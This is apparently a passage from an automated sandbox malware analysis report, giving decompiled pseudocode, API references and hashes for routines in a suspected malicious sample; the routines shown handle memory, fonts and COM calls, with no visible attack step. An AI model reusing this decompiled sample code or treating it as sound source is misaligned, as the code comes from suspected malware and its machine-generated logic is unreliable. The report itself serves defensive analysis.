                                                                                                                                                                                                                            0x00460ace
                                                                                                                                                                                                                            0x00460ac5
                                                                                                                                                                                                                            0x00460ac5
                                                                                                                                                                                                                            0x00460ac5
                                                                                                                                                                                                                            0x00460ad5
                                                                                                                                                                                                                            0x00460ad6
                                                                                                                                                                                                                            0x00460ad8
                                                                                                                                                                                                                            0x00460adf

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • 73C9AC50.USER32(00000000,?,?,00472817,00000000,0047287C,?,00000000,00000000), ref: 00460AA4
                                                                                                                                                                                                                            • 73C9AD70.GDI32(00000000,0000000C,00000000,?,?,00472817,00000000,0047287C,?,00000000,00000000), ref: 00460AAE
                                                                                                                                                                                                                            • 73C9AD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,00472817,00000000,0047287C,?,00000000,00000000), ref: 00460AB8
                                                                                                                                                                                                                            • 73C9B380.USER32(00000000,00000000,00000000,0000000E,00000000,0000000C,00000000,?,?,00472817,00000000,0047287C,?,00000000,00000000), ref: 00460AD8
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: B380
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 120756276-0
                                                                                                                                                                                                                            • Opcode ID: f17ef44ababa0ecd0db7bdc76ea68415ab822dc2a75e97f62b80bd756f6888bc
                                                                                                                                                                                                                            • Instruction ID: e5fe4370b8b3d872c1f259c9bd4e612fc1c14159820c3ed1a6be214ca3dc50fe
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f17ef44ababa0ecd0db7bdc76ea68415ab822dc2a75e97f62b80bd756f6888bc
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2DE08C52A49354A8F26032B90C87B6B094C8B213A9F04443BFD017A1C3E4BD1C4492BF
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00407A04 Relevance: 6.0, APIs: 4, Instructions: 11memoryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00407A04(void* __eax, int __ecx, long __edx) {
				void* _t2;
				void* _t4;

				_t2 = GlobalHandle(__eax);
				GlobalUnWire(_t2);
				_t4 = GlobalReAlloc(_t2, __edx, __ecx);
				GlobalFix(_t4);
				return _t4;
			}





                                                                                                                                                                                                                            0x00407a07
                                                                                                                                                                                                                            0x00407a0e
                                                                                                                                                                                                                            0x00407a13
                                                                                                                                                                                                                            0x00407a19
                                                                                                                                                                                                                            0x00407a1e

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Global$AllocHandleWire
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2210401237-0
                                                                                                                                                                                                                            • Opcode ID: b4c34fbc1b13ea6a858e844dfc3f0a34d9fd416c56990660549c196e3363f7a4
                                                                                                                                                                                                                            • Instruction ID: 29c6e5d5043a0d7070d9946f6a7af6df8548ecb0a33a5036fe490b322c4e14a4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b4c34fbc1b13ea6a858e844dfc3f0a34d9fd416c56990660549c196e3363f7a4
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 12B002F4C5820538EA5433B24C0FD3F111C99947093804A6E7840BA2C7987DB846407F
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0047847C Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 260COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 75%
                                                                                                                                                                                                                            			E0047847C(intOrPtr* __eax, void* __ebx, intOrPtr* __ecx, intOrPtr* __edx, void* __edi, void* __esi, void* __fp0, signed int _a4, signed int* _a8) {
				intOrPtr* _v8;
				intOrPtr* _v12;
				signed int _v16;
				signed int _v20;
				signed int* _v24;
				signed int* _v28;
				signed int _v32;
				signed int* _v36;
				intOrPtr _v40;
				signed int _v44;
				intOrPtr _v48;
				char _v52;
				char _v84;
				signed int _v1620;
				signed int _t142;
				intOrPtr _t143;
				intOrPtr* _t144;
				intOrPtr _t147;
				signed char _t157;
				signed char _t158;
				signed int* _t165;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t224;
				intOrPtr _t225;
				intOrPtr _t226;
				intOrPtr _t227;
				signed int _t256;
				intOrPtr* _t258;
				void* _t260;
				void* _t261;
				intOrPtr _t262;
				void* _t276;

				_t276 = __fp0;
				_t260 = _t261;
				_t262 = _t261 + 0xfffff9b0;
				_v12 = __ecx;
				_t258 = __edx;
				_v8 = __eax;
				_t224 =  *0x417dc0; // 0x417dc4
				E004053AC( &_v84, _t224);
				_push(_t260);
				_push(0x4787af);
				_push( *[fs:eax]);
				 *[fs:eax] = _t262;
				_v20 = 0;
				_t211 = 0;
				_push(_t260);
				_push(0x47878c);
				_push( *[fs:ecx]);
				 *[fs:ecx] = _t262;
				_t256 =  *(__edx + 1) & 0x000000ff;
				if(_t256 > 0x40) {
					_t211 =  *0x49d980; // 0x477e3c
					E0040D200(_t211, 1);
					E00404378();
				}
				if(_t256 == 0) {
					L25:
					_v52 =  &_v1620;
					_v48 = _v12 + 4;
					_v44 = _t256;
					_v40 = 0;
					_t225 =  *_v12;
					_t142 =  *_t258;
					if(0 != 4) {
						__eflags = 0 - 1;
						if(0 == 1) {
							__eflags = _t256;
							if(__eflags == 0) {
								__eflags = _a4;
								if(__eflags != 0) {
									_t142 = 3;
								}
							}
						}
					} else {
						if((_v1620 & 0x00000fff) == 9) {
							_t142 = 8;
						}
						 *_v12 = 0xfffffffd;
						_v48 = _v48 - 4;
						_v40 = _v40 + 1;
					}
					_push(0);
					_push( &_v84);
					_push(_a4);
					_push( &_v52);
					_push(_t142);
					_push(0);
					_t143 =  *0x49d770; // 0x49b500
					_push(_t143);
					_push(_t225);
					_t144 = _v8;
					_push(_t144);
					if( *((intOrPtr*)( *_t144 + 0x18))() != 0) {
						E00478A5C();
					}
					_t207 = _v20;
					if(_t207 == 0) {
						L39:
						_t147 = 0;
						_pop(_t226);
						 *[fs:eax] = _t226;
						_push(0x478793);
						_t208 = _v20;
						if(_t208 == 0) {
							L41:
							return _t147;
						} else {
							goto L40;
						}
						do {
							L40:
							_t208 = _t208 - 1;
							_t147 =  *((intOrPtr*)(_t260 + _t208 * 8 - 0x250));
							_push(_t147);
							L00417E14();
						} while (_t208 != 0);
						goto L41;
					} else {
						do {
							_t207 = _t207 - 1;
							_t148 = _t260 + _t207 * 8 - 0x250;
							_t227 =  *((intOrPtr*)(_t260 + _t207 * 8 - 0x250 + 4));
							_t272 = _t227;
							if(_t227 != 0) {
								E00405950( *_t148,  *_t148, _t227, _t272);
							}
						} while (_t207 != 0);
						goto L39;
					}
				} else {
					_v24 = _a8;
					_v28 = _t260 + (_t256 + _t256) * 8 - 0x650;
					_t209 = 0;
					do {
						_v28 = _v28 - 0x10;
						_t157 =  *((intOrPtr*)(_t258 + _t209 + 3));
						_v16 = _t157 & 0x7f;
						_t158 = _t157 & 0x00000080;
						if(_v16 != 0xa) {
							__eflags = _v16 - 0x48;
							if(_v16 != 0x48) {
								__eflags = _t158;
								if(_t158 == 0) {
									__eflags = _v16 - 0xc;
									if(_v16 != 0xc) {
										 *_v28 = _v16;
										_v28[2] =  *_v24;
										__eflags = _v16 - 5;
										if(_v16 >= 5) {
											__eflags = _v16 - 7;
											if(_v16 <= 7) {
												_t93 =  &_v24;
												 *_t93 =  &(_v24[1]);
												__eflags =  *_t93;
												_v28[3] =  *_v24;
											}
										}
									} else {
										__eflags =  *_v24 - 0x100;
										if( *_v24 != 0x100) {
											_t165 = _v24;
											 *_v28 =  *_t165;
											_v28[1] = _t165[1];
											_t211 = _v28;
											_v28[2] = _t165[2];
											_v28[3] = _t165[3];
											_v24 =  &(_v24[3]);
										} else {
											_v36 = _t260 + _v20 * 8 - 0x250;
											 *_v36 = E00405974(_v24[2], _t211);
											_v36[1] = 0;
											 *_v28 = 8;
											_v28[2] =  *_v36;
											_v20 = _v20 + 1;
										}
									}
									goto L23;
								}
								__eflags = _v16 - 0xc;
								if(_v16 == 0xc) {
									__eflags =  *( *_v24) - 0x100;
									if( *( *_v24) == 0x100) {
										_t211 = 8;
										E00411330( *_v24, 8,  *_v24, _t256, _t276);
									}
								}
								 *_v28 = _v16 | 0x00004000;
								_v28[2] =  *_v24;
								goto L23;
							} else {
								_v32 = _t260 + _v20 * 8 - 0x250;
								__eflags = _t158;
								if(_t158 == 0) {
									 *_v32 = E00405974( *_v24, _t211);
									__eflags = 0;
									 *(_v32 + 4) = 0;
									 *_v28 = 8;
									_v28[2] =  *_v32;
								} else {
									 *_v32 = E00405974( *( *_v24), _t211);
									 *(_v32 + 4) =  *_v24;
									 *_v28 = 0x4008;
									_v28[2] = _v32;
								}
								_v20 = _v20 + 1;
								L23:
								_t98 =  &_v24;
								 *_t98 =  &(_v24[1]);
								__eflags =  *_t98;
								goto L24;
							}
						} else {
							 *_v28 = 0xa;
							_v28[2] = 0x80020004;
						}
						L24:
						_t209 = _t209 + 1;
					} while (_t256 != _t209);
					goto L25;
				}
			}





































                                                                                                                                                                                                                            0x0047847c
                                                                                                                                                                                                                            0x0047847d
                                                                                                                                                                                                                            0x0047847f
                                                                                                                                                                                                                            0x00478488
                                                                                                                                                                                                                            0x0047848b
                                                                                                                                                                                                                            0x0047848d
                                                                                                                                                                                                                            0x00478493
                                                                                                                                                                                                                            0x00478499
                                                                                                                                                                                                                            0x004784a0
                                                                                                                                                                                                                            0x004784a1
                                                                                                                                                                                                                            0x004784a6
                                                                                                                                                                                                                            0x004784a9
                                                                                                                                                                                                                            0x004784ae
                                                                                                                                                                                                                            0x004784b1
                                                                                                                                                                                                                            0x004784b3
                                                                                                                                                                                                                            0x004784b4
                                                                                                                                                                                                                            0x004784b9
                                                                                                                                                                                                                            0x004784bc
                                                                                                                                                                                                                            0x004784bf
                                                                                                                                                                                                                            0x004784c6
                                                                                                                                                                                                                            0x004784c8
                                                                                                                                                                                                                            0x004784d5
                                                                                                                                                                                                                            0x004784da
                                                                                                                                                                                                                            0x004784da
                                                                                                                                                                                                                            0x004784e1
                                                                                                                                                                                                                            0x004786aa
                                                                                                                                                                                                                            0x004786b0
                                                                                                                                                                                                                            0x004786b9
                                                                                                                                                                                                                            0x004786bc
                                                                                                                                                                                                                            0x004786c4
                                                                                                                                                                                                                            0x004786ca
                                                                                                                                                                                                                            0x004786ce
                                                                                                                                                                                                                            0x004786d3
                                                                                                                                                                                                                            0x004786fd
                                                                                                                                                                                                                            0x00478700
                                                                                                                                                                                                                            0x00478702
                                                                                                                                                                                                                            0x00478704
                                                                                                                                                                                                                            0x00478706
                                                                                                                                                                                                                            0x0047870a
                                                                                                                                                                                                                            0x0047870c
                                                                                                                                                                                                                            0x0047870c
                                                                                                                                                                                                                            0x0047870a
                                                                                                                                                                                                                            0x00478704
                                                                                                                                                                                                                            0x004786d5
                                                                                                                                                                                                                            0x004786e4
                                                                                                                                                                                                                            0x004786e6
                                                                                                                                                                                                                            0x004786e6
                                                                                                                                                                                                                            0x004786ee
                                                                                                                                                                                                                            0x004786f4
                                                                                                                                                                                                                            0x004786f8
                                                                                                                                                                                                                            0x004786f8
                                                                                                                                                                                                                            0x00478711
                                                                                                                                                                                                                            0x00478716
                                                                                                                                                                                                                            0x0047871a
                                                                                                                                                                                                                            0x0047871e
                                                                                                                                                                                                                            0x0047871f
                                                                                                                                                                                                                            0x00478720
                                                                                                                                                                                                                            0x00478722
                                                                                                                                                                                                                            0x00478727
                                                                                                                                                                                                                            0x00478728
                                                                                                                                                                                                                            0x00478729
                                                                                                                                                                                                                            0x0047872c
                                                                                                                                                                                                                            0x00478734
                                                                                                                                                                                                                            0x00478739
                                                                                                                                                                                                                            0x00478739
                                                                                                                                                                                                                            0x0047873e
                                                                                                                                                                                                                            0x00478743
                                                                                                                                                                                                                            0x00478765
                                                                                                                                                                                                                            0x00478765
                                                                                                                                                                                                                            0x00478767
                                                                                                                                                                                                                            0x0047876a
                                                                                                                                                                                                                            0x0047876d
                                                                                                                                                                                                                            0x00478772
                                                                                                                                                                                                                            0x00478777
                                                                                                                                                                                                                            0x0047878b
                                                                                                                                                                                                                            0x0047878b
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00478779
                                                                                                                                                                                                                            0x00478779
                                                                                                                                                                                                                            0x00478779
                                                                                                                                                                                                                            0x0047877a
                                                                                                                                                                                                                            0x00478781
                                                                                                                                                                                                                            0x00478782
                                                                                                                                                                                                                            0x00478787
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00478745
                                                                                                                                                                                                                            0x00478745
                                                                                                                                                                                                                            0x00478745
                                                                                                                                                                                                                            0x00478746
                                                                                                                                                                                                                            0x0047874d
                                                                                                                                                                                                                            0x00478750
                                                                                                                                                                                                                            0x00478752
                                                                                                                                                                                                                            0x0047875c
                                                                                                                                                                                                                            0x0047875c
                                                                                                                                                                                                                            0x00478761
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00478745
                                                                                                                                                                                                                            0x004784e7
                                                                                                                                                                                                                            0x004784ea
                                                                                                                                                                                                                            0x004784f8
                                                                                                                                                                                                                            0x004784fb
                                                                                                                                                                                                                            0x004784fd
                                                                                                                                                                                                                            0x004784fd
                                                                                                                                                                                                                            0x00478501
                                                                                                                                                                                                                            0x00478510
                                                                                                                                                                                                                            0x00478513
                                                                                                                                                                                                                            0x00478519
                                                                                                                                                                                                                            0x00478533
                                                                                                                                                                                                                            0x00478537
                                                                                                                                                                                                                            0x004785ad
                                                                                                                                                                                                                            0x004785af
                                                                                                                                                                                                                            0x004785f6
                                                                                                                                                                                                                            0x004785fa
                                                                                                                                                                                                                            0x00478675
                                                                                                                                                                                                                            0x0047867f
                                                                                                                                                                                                                            0x00478682
                                                                                                                                                                                                                            0x00478686
                                                                                                                                                                                                                            0x00478688
                                                                                                                                                                                                                            0x0047868c
                                                                                                                                                                                                                            0x0047868e
                                                                                                                                                                                                                            0x0047868e
                                                                                                                                                                                                                            0x0047868e
                                                                                                                                                                                                                            0x0047869a
                                                                                                                                                                                                                            0x0047869a
                                                                                                                                                                                                                            0x0047868c
                                                                                                                                                                                                                            0x004785fc
                                                                                                                                                                                                                            0x004785ff
                                                                                                                                                                                                                            0x00478604
                                                                                                                                                                                                                            0x00478644
                                                                                                                                                                                                                            0x0047864c
                                                                                                                                                                                                                            0x00478654
                                                                                                                                                                                                                            0x0047865a
                                                                                                                                                                                                                            0x0047865d
                                                                                                                                                                                                                            0x00478666
                                                                                                                                                                                                                            0x00478669
                                                                                                                                                                                                                            0x00478606
                                                                                                                                                                                                                            0x00478610
                                                                                                                                                                                                                            0x00478621
                                                                                                                                                                                                                            0x00478628
                                                                                                                                                                                                                            0x0047862e
                                                                                                                                                                                                                            0x0047863c
                                                                                                                                                                                                                            0x0047863f
                                                                                                                                                                                                                            0x0047863f
                                                                                                                                                                                                                            0x00478604
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004785fa
                                                                                                                                                                                                                            0x004785b1
                                                                                                                                                                                                                            0x004785b5
                                                                                                                                                                                                                            0x004785bc
                                                                                                                                                                                                                            0x004785c1
                                                                                                                                                                                                                            0x004785cf
                                                                                                                                                                                                                            0x004785d4
                                                                                                                                                                                                                            0x004785d4
                                                                                                                                                                                                                            0x004785c1
                                                                                                                                                                                                                            0x004785e4
                                                                                                                                                                                                                            0x004785ee
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00478539
                                                                                                                                                                                                                            0x00478543
                                                                                                                                                                                                                            0x00478546
                                                                                                                                                                                                                            0x00478548
                                                                                                                                                                                                                            0x00478587
                                                                                                                                                                                                                            0x0047858c
                                                                                                                                                                                                                            0x0047858e
                                                                                                                                                                                                                            0x00478594
                                                                                                                                                                                                                            0x004785a2
                                                                                                                                                                                                                            0x0047854a
                                                                                                                                                                                                                            0x00478559
                                                                                                                                                                                                                            0x00478563
                                                                                                                                                                                                                            0x00478569
                                                                                                                                                                                                                            0x00478575
                                                                                                                                                                                                                            0x00478575
                                                                                                                                                                                                                            0x004785a5
                                                                                                                                                                                                                            0x0047869d
                                                                                                                                                                                                                            0x0047869d
                                                                                                                                                                                                                            0x0047869d
                                                                                                                                                                                                                            0x0047869d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0047869d
                                                                                                                                                                                                                            0x0047851b
                                                                                                                                                                                                                            0x0047851e
                                                                                                                                                                                                                            0x00478527
                                                                                                                                                                                                                            0x00478527
                                                                                                                                                                                                                            0x004786a1
                                                                                                                                                                                                                            0x004786a1
                                                                                                                                                                                                                            0x004786a2
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004784fd

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 00478782
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FreeString
                                                                                                                                                                                                                            • String ID: <~G$H
                                                                                                                                                                                                                            • API String ID: 3341692771-3576284788
                                                                                                                                                                                                                            • Opcode ID: ecd8712ba81d153100f6d8ed10ab1aa9da3ca18861188e6ea00d8c1b46d0990f
                                                                                                                                                                                                                            • Instruction ID: b8f1c08bed6d2714fac9d526e07dd471d665f945914cf58d975e5e29605529f8
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ecd8712ba81d153100f6d8ed10ab1aa9da3ca18861188e6ea00d8c1b46d0990f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E7B1F8B4A006099FDB14CF99C884AAEB7F1FF49314F20C56AE909AB351D738AD41CF64
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00424E24 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 123COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 79%
                                                                                                                                                                                                                            			E00424E24(void* __eax, void* __ebx, void* __ecx) {
				signed int _v8;
				struct tagLOGFONTA _v68;
				char _v72;
				char _v76;
				char _v80;
				intOrPtr _t76;
				intOrPtr _t81;
				void* _t107;
				void* _t116;
				intOrPtr _t126;
				void* _t137;
				void* _t138;
				intOrPtr _t139;

				_t137 = _t138;
				_t139 = _t138 + 0xffffffb4;
				_v80 = 0;
				_v76 = 0;
				_v72 = 0;
				_t116 = __eax;
				_push(_t137);
				_push(0x424fad);
				_push( *[fs:eax]);
				 *[fs:eax] = _t139;
				_v8 =  *((intOrPtr*)(__eax + 0x10));
				if( *((intOrPtr*)(_v8 + 8)) != 0) {
					 *[fs:eax] = 0;
					_push(0x424fb4);
					return E004049E4( &_v80, 3);
				} else {
					_t76 =  *0x49e8e0; // 0x2210a30
					E00424168(_t76);
					_push(_t137);
					_push(0x424f85);
					_push( *[fs:eax]);
					 *[fs:eax] = _t139;
					if( *((intOrPtr*)(_v8 + 8)) == 0) {
						_v68.lfHeight =  *(_v8 + 0x14);
						_v68.lfWidth = 0;
						_v68.lfEscapement = 0;
						_v68.lfOrientation = 0;
						if(( *(_v8 + 0x19) & 0x00000001) == 0) {
							_v68.lfWeight = 0x190;
						} else {
							_v68.lfWeight = 0x2bc;
						}
						_v68.lfItalic = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000002) != 0x00000000;
						_v68.lfUnderline = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000004) != 0x00000000;
						_v68.lfStrikeOut = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000008) != 0x00000000;
						_v68.lfCharSet =  *((intOrPtr*)(_v8 + 0x1a));
						E00404C24( &_v72, _v8 + 0x1b);
						if(E00408F88(_v72, "Default") != 0) {
							E00404C24( &_v80, _v8 + 0x1b);
							E0040A020( &(_v68.lfFaceName), _v80);
						} else {
							E00404C24( &_v76, "\rMS Sans Serif");
							E0040A020( &(_v68.lfFaceName), _v76);
						}
						_v68.lfQuality = 0;
						_v68.lfOutPrecision = 0;
						_v68.lfClipPrecision = 0;
						_t107 = E00425108(_t116) - 1;
						if(_t107 == 0) {
							_v68.lfPitchAndFamily = 2;
						} else {
							if(_t107 == 1) {
								_v68.lfPitchAndFamily = 1;
							} else {
								_v68.lfPitchAndFamily = 0;
							}
						}
						 *((intOrPtr*)(_v8 + 8)) = CreateFontIndirectA( &_v68);
					}
					_pop(_t126);
					 *[fs:eax] = _t126;
					_push(0x424f8c);
					_t81 =  *0x49e8e0; // 0x2210a30
					return E00424174(_t81);
				}
			}
















                                                                                                                                                                                                                            0x00424e25
                                                                                                                                                                                                                            0x00424e27
                                                                                                                                                                                                                            0x00424e2d
                                                                                                                                                                                                                            0x00424e30
                                                                                                                                                                                                                            0x00424e33
                                                                                                                                                                                                                            0x00424e36
                                                                                                                                                                                                                            0x00424e3a
                                                                                                                                                                                                                            0x00424e3b
                                                                                                                                                                                                                            0x00424e40
                                                                                                                                                                                                                            0x00424e43
                                                                                                                                                                                                                            0x00424e49
                                                                                                                                                                                                                            0x00424e53
                                                                                                                                                                                                                            0x00424f97
                                                                                                                                                                                                                            0x00424f9a
                                                                                                                                                                                                                            0x00424fac
                                                                                                                                                                                                                            0x00424e59
                                                                                                                                                                                                                            0x00424e59
                                                                                                                                                                                                                            0x00424e5e
                                                                                                                                                                                                                            0x00424e65
                                                                                                                                                                                                                            0x00424e66
                                                                                                                                                                                                                            0x00424e6b
                                                                                                                                                                                                                            0x00424e6e
                                                                                                                                                                                                                            0x00424e78
                                                                                                                                                                                                                            0x00424e84
                                                                                                                                                                                                                            0x00424e89
                                                                                                                                                                                                                            0x00424e8e
                                                                                                                                                                                                                            0x00424e93
                                                                                                                                                                                                                            0x00424e9d
                                                                                                                                                                                                                            0x00424ea8
                                                                                                                                                                                                                            0x00424e9f
                                                                                                                                                                                                                            0x00424e9f
                                                                                                                                                                                                                            0x00424e9f
                                                                                                                                                                                                                            0x00424eb9
                                                                                                                                                                                                                            0x00424ec6
                                                                                                                                                                                                                            0x00424ed3
                                                                                                                                                                                                                            0x00424edc
                                                                                                                                                                                                                            0x00424ee8
                                                                                                                                                                                                                            0x00424efc
                                                                                                                                                                                                                            0x00424f21
                                                                                                                                                                                                                            0x00424f2c
                                                                                                                                                                                                                            0x00424efe
                                                                                                                                                                                                                            0x00424f06
                                                                                                                                                                                                                            0x00424f11
                                                                                                                                                                                                                            0x00424f11
                                                                                                                                                                                                                            0x00424f31
                                                                                                                                                                                                                            0x00424f35
                                                                                                                                                                                                                            0x00424f39
                                                                                                                                                                                                                            0x00424f44
                                                                                                                                                                                                                            0x00424f46
                                                                                                                                                                                                                            0x00424f4e
                                                                                                                                                                                                                            0x00424f48
                                                                                                                                                                                                                            0x00424f4a
                                                                                                                                                                                                                            0x00424f54
                                                                                                                                                                                                                            0x00424f4c
                                                                                                                                                                                                                            0x00424f5a
                                                                                                                                                                                                                            0x00424f5a
                                                                                                                                                                                                                            0x00424f4a
                                                                                                                                                                                                                            0x00424f6a
                                                                                                                                                                                                                            0x00424f6a
                                                                                                                                                                                                                            0x00424f6f
                                                                                                                                                                                                                            0x00424f72
                                                                                                                                                                                                                            0x00424f75
                                                                                                                                                                                                                            0x00424f7a
                                                                                                                                                                                                                            0x00424f84
                                                                                                                                                                                                                            0x00424f84

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 00424168: RtlEnterCriticalSection.KERNEL32(?,004241A5), ref: 0042416C
                                                                                                                                                                                                                            • CreateFontIndirectA.GDI32(?), ref: 00424F62
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateCriticalEnterFontIndirectSection
                                                                                                                                                                                                                            • String ID: MS Sans Serif$Default
                                                                                                                                                                                                                            • API String ID: 2931345757-2137701257
                                                                                                                                                                                                                            • Opcode ID: 89d54db4af104641d8e73ec6089c9fc87516c81d3827a31575630f39306a7239
                                                                                                                                                                                                                            • Instruction ID: b3d76d3ca7c544b37bc71fdcf573607e07253616adc25b4daf7a036753d91774
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 89d54db4af104641d8e73ec6089c9fc87516c81d3827a31575630f39306a7239
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 16517F31B04258DFDB01DFA4D641B8DBBF6EF88304FA640AAE804A7352D3389E05DB59
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0040D5A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 86%
                                                                                                                                                                                                                            			E0040D5A0(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				struct _MEMORY_BASIC_INFORMATION _v36;
				char _v297;
				char _v304;
				intOrPtr _v308;
				char _v312;
				char _v316;
				char _v320;
				intOrPtr _v324;
				char _v328;
				void* _v332;
				char _v336;
				char _v340;
				char _v344;
				char _v348;
				intOrPtr _v352;
				char _v356;
				char _v360;
				char _v364;
				void* _v368;
				char _v372;
				intOrPtr _t52;
				intOrPtr _t60;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr _t89;
				intOrPtr _t101;
				void* _t108;
				intOrPtr _t110;
				void* _t113;

				_t108 = __edi;
				_v372 = 0;
				_v336 = 0;
				_v344 = 0;
				_v340 = 0;
				_v8 = 0;
				_push(_t113);
				_push(0x40d75b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t113 + 0xfffffe90;
				_t89 =  *((intOrPtr*)(_a4 - 4));
				if( *((intOrPtr*)(_t89 + 0x14)) != 0) {
					_t52 =  *0x49dbd4; // 0x407ddc
					E00406A70(_t52,  &_v8);
				} else {
					_t86 =  *0x49de48; // 0x407dd4
					E00406A70(_t86,  &_v8);
				}
				_t110 =  *((intOrPtr*)(_t89 + 0x18));
				VirtualQuery( *(_t89 + 0xc),  &_v36, 0x1c);
				if(_v36.State != 0x1000 || GetModuleFileNameA(_v36.AllocationBase,  &_v297, 0x105) == 0) {
					_v368 =  *(_t89 + 0xc);
					_v364 = 5;
					_v360 = _v8;
					_v356 = 0xb;
					_v352 = _t110;
					_v348 = 5;
					_t60 =  *0x49dbfc; // 0x407d7c
